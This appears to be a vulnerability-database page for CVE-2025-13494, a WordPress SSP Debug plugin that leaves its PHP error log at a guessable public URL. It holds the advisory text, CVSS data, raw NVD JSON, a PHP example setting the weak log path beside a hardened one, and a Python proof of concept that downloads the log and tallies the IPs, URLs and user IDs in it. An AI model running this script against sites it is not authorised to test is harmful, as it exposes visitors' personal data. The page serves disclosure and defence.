Security Vulnerability Report
CVE-2025-13494 CVSS 5.3 MEDIUM

Published: 2025-12-05 05:16:58
Last Modified: 2026-04-15 00:35:42

Description

The SSP Debug plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0. This is due to the plugin storing PHP error logs in a predictable, web-accessible location (wp-content/uploads/ssp-debug/ssp-debug.log) without any access controls. This makes it possible for unauthenticated attackers to view sensitive debugging information including full URLs, client IP addresses, User-Agent strings, WordPress user IDs, and internal filesystem paths.
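The weak pattern the description reports, placed next to a hardened way to keep a PHP error log off the public web. This is an added illustration, not code from the SSP Debug plugin (the page links to ssp-debug.php#L221 but does not reproduce it): ssp_weak_log_path() is a reconstruction of the behaviour described above, the ssp_* function names are hypothetical, and ABSPATH, WP_CONTENT_DIR and the site secret are stubbed so the script runs from the PHP CLI without WordPress (in a plugin they come from wp-config.php and wp_salt()/AUTH_KEY).

```php
<?php
// Added example, not the plugin's code. Runs stand-alone from the CLI:
// the WordPress constants below are stubs pointing into a temp directory.
declare(strict_types=1);

if (!defined('ABSPATH')) {
    define('ABSPATH', rtrim(sys_get_temp_dir(), '/') . '/ssp-demo/public_html/');
}
if (!defined('WP_CONTENT_DIR')) {
    define('WP_CONTENT_DIR', ABSPATH . 'wp-content');
}

/**
 * Weak (illustrative reconstruction of the reported behaviour): a fixed
 * filename inside wp-content/uploads, the one directory every WordPress
 * install serves straight to the public with no access control. Anyone can
 * fetch /wp-content/uploads/ssp-debug/ssp-debug.log once it exists.
 */
function ssp_weak_log_path(): string
{
    $dir = WP_CONTENT_DIR . '/uploads/ssp-debug';
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException("cannot create $dir");
    }
    return $dir . '/ssp-debug.log';
}

/**
 * Hardened: three independent controls, so the log stays private even if
 * one of them is missing on a given host.
 *  1. A directory under wp-content (not uploads) with an Apache deny rule
 *     and an empty index.php, so neither direct fetches nor listings work.
 *  2. A filename derived from a per-site secret, so it cannot be guessed.
 *  3. The file is created 0600, so other local accounts cannot read it.
 * Where the host allows it, put the directory above the document root
 * instead; the web server then cannot serve it at all.
 */
function ssp_hardened_log_path(string $siteSecret): string
{
    $dir = WP_CONTENT_DIR . '/ssp-debug-private';
    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException("cannot create $dir");
    }
    // Apache 2.4 and 2.2 forms; nginx ignores .htaccess and needs a server-level rule.
    $htaccess = "<IfModule mod_authz_core.c>\n    Require all denied\n</IfModule>\n"
              . "<IfModule !mod_authz_core.c>\n    Order deny,allow\n    Deny from all\n</IfModule>\n";
    file_put_contents($dir . '/.htaccess', $htaccess, LOCK_EX);
    file_put_contents($dir . '/index.php', "<?php\n// Silence is golden.\n", LOCK_EX);

    // In WordPress derive this from wp_hash()/AUTH_KEY; $siteSecret is a stand-in here.
    $name = 'ssp-debug-' . substr(hash_hmac('sha256', 'ssp-debug-log', $siteSecret), 0, 32) . '.log';
    $path = $dir . '/' . $name;
    if (!file_exists($path)) {
        touch($path);
        chmod($path, 0600);
    }
    return $path;
}

/** Point PHP's own error log at $path, which is what a debug plugin does. */
function ssp_enable_error_log(string $path): void
{
    ini_set('log_errors', '1');
    ini_set('error_log', $path);
}

/**
 * True if the web server would hand $path to a client as-is: the file sits
 * under ABSPATH and its directory carries no .htaccess deny rule. The
 * .htaccess check only means something on Apache; on nginx treat any path
 * under ABSPATH as exposed unless the server config denies it.
 */
function ssp_log_is_web_exposed(string $path): bool
{
    $real = realpath(dirname($path));
    $root = realpath(ABSPATH);
    if ($real === false || $root === false || strpos($real, $root) !== 0) {
        return false; // outside the document root
    }
    return !is_file($real . '/.htaccess');
}

if (PHP_SAPI === 'cli') {
    $weak = ssp_weak_log_path();
    $safe = ssp_hardened_log_path('constructed-demo-secret-do-not-reuse');
    foreach ([$weak, $safe] as $p) {
        ssp_enable_error_log($p);
        // Constructed entry of the kind the report lists: client IP, URL, user id.
        error_log('demo: ' . ($_SERVER['REMOTE_ADDR'] ?? '203.0.113.7') . ' GET /wp-admin/ user_id=1');
        printf("%s\n  exposed=%s  mode=%o\n", $p, ssp_log_is_web_exposed($p) ? 'yes' : 'no', fileperms($p) & 0777);
    }
}
```

Run it with `php ssp-log-hardening.php`; the weak path reports exposed=yes with mode 644, the hardened one exposed=no with mode 600. On nginx the .htaccess layer does nothing, so add a `location` block that denies the private directory at the server level, and prefer a directory above the document root whenever the host permits it. WordPress's own WP_DEBUG_LOG constant also accepts an arbitrary path, which is the simplest way to get the log out of wp-content/uploads.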

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Reading the vector: reachable over the network, low attack complexity, no privileges and no user interaction required, scope unchanged; confidentiality impact is Low (only the log contents are exposed), with no integrity or availability impact. Exploitability sub-score 3.9, impact sub-score 1.4.

Configurations (Affected Products)

No CPE configuration data is attached to the NVD record. Affected product, per the description and the reference URLs: the WordPress SSP Debug plugin (slug ssp-debugging), all versions <= 1.0.0. No fixed version is listed in this record.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13494 PoC - WordPress SSP Debug Sensitive Information Disclosure
# Author: Security Researcher
# Date: 2025-12-05
import re
import sys

import requests


def check_vulnerability(target_url):
    """
    Check if the target WordPress site is vulnerable to CVE-2025-13494
    """
    # Construct the path to the debug log file
    log_path = "/wp-content/uploads/ssp-debug/ssp-debug.log"
    full_url = target_url.rstrip('/') + log_path

    print(f"[*] Target: {target_url}")
    print(f"[*] Checking log file: {full_url}")

    try:
        response = requests.get(full_url, timeout=10)

        if response.status_code == 200:
            # Some hosts answer 200 with an HTML "not found" page (soft 404).
            # The real log is served as plain text, so an HTML body is not a hit.
            if 'text/html' in response.headers.get('Content-Type', ''):
                print("[-] HTTP 200 with an HTML body - likely a soft 404, not the log")
                return False

            print("[!] VULNERABLE - Log file is accessible!")
            print(f"[+] Content length: {len(response.text)} bytes")
            print("\n[+] Log file contents (first 2000 chars):")
            print("-" * 50)
            print(response.text[:2000])

            # Search for sensitive information patterns
            sensitive_patterns = {
                'URLs': r'https?://[^\s]+',
                'IP Addresses': r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
                'User IDs': r'user[_\s]?id[^"]*[:=][^",]+',
                'File Paths': r'/[a-zA-Z0-9_/\-\.]+',
            }

            print("\n[+] Extracted sensitive information:")
            for pattern_name, pattern in sensitive_patterns.items():
                matches = set(re.findall(pattern, response.text, re.IGNORECASE))
                if matches:
                    print(f"    {pattern_name}: {len(matches)} found")

            return True

        elif response.status_code == 403:
            print("[-] Access forbidden - may be patched or protected")
            return False
        else:
            print(f"[-] Log file not found (HTTP {response.status_code})")
            return False

    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = input("Enter target URL: ").strip()

    check_vulnerability(target)

# Usage: python cve-2025-13494.py https://example.com

References

https://plugins.trac.wordpress.org/browser/ssp-debugging/tags/1.0.0/ssp-debug.php#L221
https://plugins.trac.wordpress.org/browser/ssp-debugging/trunk/ssp-debug.php#L221
https://www.wordfence.com/threat-intel/vulnerabilities/id/66f29499-1522-43cd-af78-9b734c66af8c?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13494",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T05:16:58.213",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The SSP Debug plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0. This is due to the plugin storing PHP error logs in a predictable, web-accessible location (wp-content/uploads/ssp-debug/ssp-debug.log) without any access controls. This makes it possible for unauthenticated attackers to view sensitive debugging information including full URLs, client IP addresses, User-Agent strings, WordPress user IDs, and internal filesystem paths."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/ssp-debugging/tags/1.0.0/ssp-debug.php#L221",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/ssp-debugging/trunk/ssp-debug.php#L221",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66f29499-1522-43cd-af78-9b734c66af8c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}